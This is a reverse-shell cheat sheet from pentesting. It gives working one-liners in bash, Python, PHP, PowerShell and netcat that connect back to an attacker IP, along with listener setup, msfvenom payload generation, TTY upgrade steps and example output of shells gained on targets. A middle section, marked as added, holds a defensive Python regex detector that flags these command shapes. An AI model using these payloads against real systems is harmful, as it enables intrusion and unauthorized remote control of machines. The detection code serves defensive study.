REVERSE SHELLS & PAYLOADS

Start listener

Always set up first — Use port 443 (less likely to be filtered)

nc -nlvp 443
or: rlwrap nc -nlvp 443
Example Output
nc -nlvp 443
Listening on 0.0.0.0 443

OR better:
rlwrap nc -nlvp 443
(rlwrap gives arrow key history in shell)

Bash reverse shell

Linux/Mac — Most reliable on Linux

bash -i >& /dev/tcp/ATTACKER_IP/443 0>&1
Example Output
bash -i >& /dev/tcp/10.10.14.2/443 0>&1

Attacker:
connect to [10.10.14.2] from [10.10.10.5] 48234
bash-4.4$ whoami
www-data

Python reverse shell

If Python is installed — Very common on Linux

python3 -c 'import socket,subprocess,os;s=socket.socket();s.connect(("ATTACKER_IP",443));os.dup2(s.fileno(),0);os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);subprocess.call(["/bin/sh","-i"])'
Example Output
python3 -c 'import socket,subprocess,os;s=socket.socket();s.connect(("10.10.14.2",443));os.dup2(s.fileno(),0);os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);subprocess.call(["/bin/sh","-i"])'

Attacker:
$ whoami
www-data

PHP reverse shell (one-liner)

In command injection or upload — Or use pentestmonkey full shell

php -r '$sock=fsockopen("ATTACKER_IP",443);exec("/bin/sh -i <&3 >&3 2>&3");'
Example Output
php -r '$sock=fsockopen("10.10.14.2",443);exec("/bin/sh -i <&3 >&3 2>&3");'

OR in a web parameter:
cmd=php+-r+'$s=fsockopen("10.10.14.2",443);exec("/bin/sh+-i+<&3+>&3+2>&3");'

Attacker:
$ whoami
www-data
(Inline PHP shell, no file upload needed)

PowerShell reverse shell

Windows targets — Or use Nishang Invoke-PowerShellTcp

powershell -e <base64_payload>
Generate: msfvenom -p cmd/windows/reverse_powershell LHOST=ATTACKER_IP LPORT=443
Example Output
powershell -e JABjAGwAaQBlAG4A...(base64)

Attacker:
connect from 10.10.10.5
PS C:\Users\admin> whoami
corp\admin

nc reverse shell

Netcat — Try both -e and mkfifo versions

nc -e /bin/sh ATTACKER_IP 443
or: rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc ATTACKER_IP 443 >/tmp/f
Example Output
rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.10.14.2 443 >/tmp/f

Attacker:
$ whoami
www-data
(Use this version when nc -e isn't available)

msfvenom payloads

Generate binary payloads — For upload + execute scenarios

Windows: msfvenom -p windows/x64/shell_reverse_tcp LHOST=ATTACKER_IP LPORT=443 -f exe -o shell.exe
Linux: msfvenom -p linux/x64/shell_reverse_tcp LHOST=ATTACKER_IP LPORT=443 -f elf -o shell.elf
Example Output
msfvenom -p windows/x64/shell_reverse_tcp LHOST=10.10.14.2 LPORT=443 -f exe -o shell.exe

Payload size: 460 bytes
Saved as: shell.exe

Transfer to target, execute, catch with nc

Upgrade to TTY shell

After getting basic shell — Full interactive shell

python3 -c 'import pty; pty.spawn("/bin/bash")'
Ctrl+Z
stty raw -echo; fg
export TERM=xterm
Example Output
$ python3 -c 'import pty; pty.spawn("/bin/bash")'
www-data@target:/var/www$ ^Z
[1]+  Stopped
$ stty raw -echo; fg
www-data@target:/var/www$ export TERM=xterm
(Now have full interactive shell with tab complete)
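
Detection side of the one-liners and the TTY upgrade above, as an added example that is not part of the original cheat sheet: a Python matcher that flags these command shapes in process command-line telemetry. The rule names, regexes and benign sample lines are constructed for illustration, and the regexes are heuristics rather than a complete signature set.

```python
import base64
import re

# Heuristic signatures (assumed names) for the command shapes on this page.
RULES = {
    "bash_dev_tcp": re.compile(r"/dev/(tcp|udp)/[^/\s]+/\d+"),
    "python_socket_dup2": re.compile(r"python[\d.]*\s+-c\b.*socket.*dup2"),
    "php_fsockopen_shell": re.compile(r"php\s+-r\b.*fsockopen\(.*/bin/(ba)?sh"),
    "nc_exec_flag": re.compile(r"\b(nc|ncat|netcat)\s.*-e\s+\S*(sh|cmd)"),
    "mkfifo_shell_pipe": re.compile(
        r"mkfifo\s+\S+.*\|\s*/bin/(ba)?sh\b.*\|\s*(nc|ncat|netcat)\b"),
    # Covers -e, -enc and -EncodedCommand followed by a long base64 argument.
    "powershell_encoded": re.compile(
        r"powershell(\.exe)?\s.*?-e(nc\w*)?\s+[A-Za-z0-9+/=]{20,}", re.I),
    "pty_spawn_upgrade": re.compile(r"pty\.spawn\("),
}

def classify(cmdline):
    """Return the sorted names of every rule matching one command line."""
    return sorted(name for name, rx in RULES.items() if rx.search(cmdline))

def scan(cmdlines):
    """Map each flagged command line to its rule hits; clean lines are omitted."""
    hits = {}
    for line in (raw.strip() for raw in cmdlines):
        found = classify(line) if line else []
        if found:
            hits[line] = found
    return hits

# Constructed command lines, as an auditd execve or EDR process feed might log them.
# The encoded PowerShell argument is a harmless placeholder ("Write-Output 1").
B64 = base64.b64encode("Write-Output 1".encode("utf-16-le")).decode()
SAMPLES = r"""
bash -i >& /dev/tcp/10.10.14.2/443 0>&1
python3 -c 'import socket,subprocess,os;s=socket.socket();s.connect(("10.10.14.2",443));os.dup2(s.fileno(),0);os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);subprocess.call(["/bin/sh","-i"])'
php -r '$sock=fsockopen("10.10.14.2",443);exec("/bin/sh -i <&3 >&3 2>&3");'
nc -e /bin/sh 10.10.14.2 443
rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.10.14.2 443 >/tmp/f
python3 -c 'import pty; pty.spawn("/bin/bash")'
nc -zv 10.0.0.5 443
python3 -c 'import socket; print(socket.gethostname())'
php -r 'echo PHP_VERSION;'
powershell -ExecutionPolicy RemoteSigned -File deploy.ps1
""".splitlines() + ["powershell -e " + B64]

if __name__ == "__main__":
    for cmd, names in scan(SAMPLES).items():
        print(", ".join(names), "<-", cmd[:60])
```

The last four lines of the literal block are benign look-alikes (a port check, a hostname lookup, a version print, a script launch) and produce no hits, which is the false-positive behaviour to check before turning rules like these into alerts.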

revshells.com

Generate any reverse shell — Bookmark this

https://www.revshells.com/
Example Output
Visit https://www.revshells.com/
Select: Bash -i, Python3, PHP, PowerShell #3
Enter: IP and Port
Copy generated payload
(Auto-generates reverse shells for any language)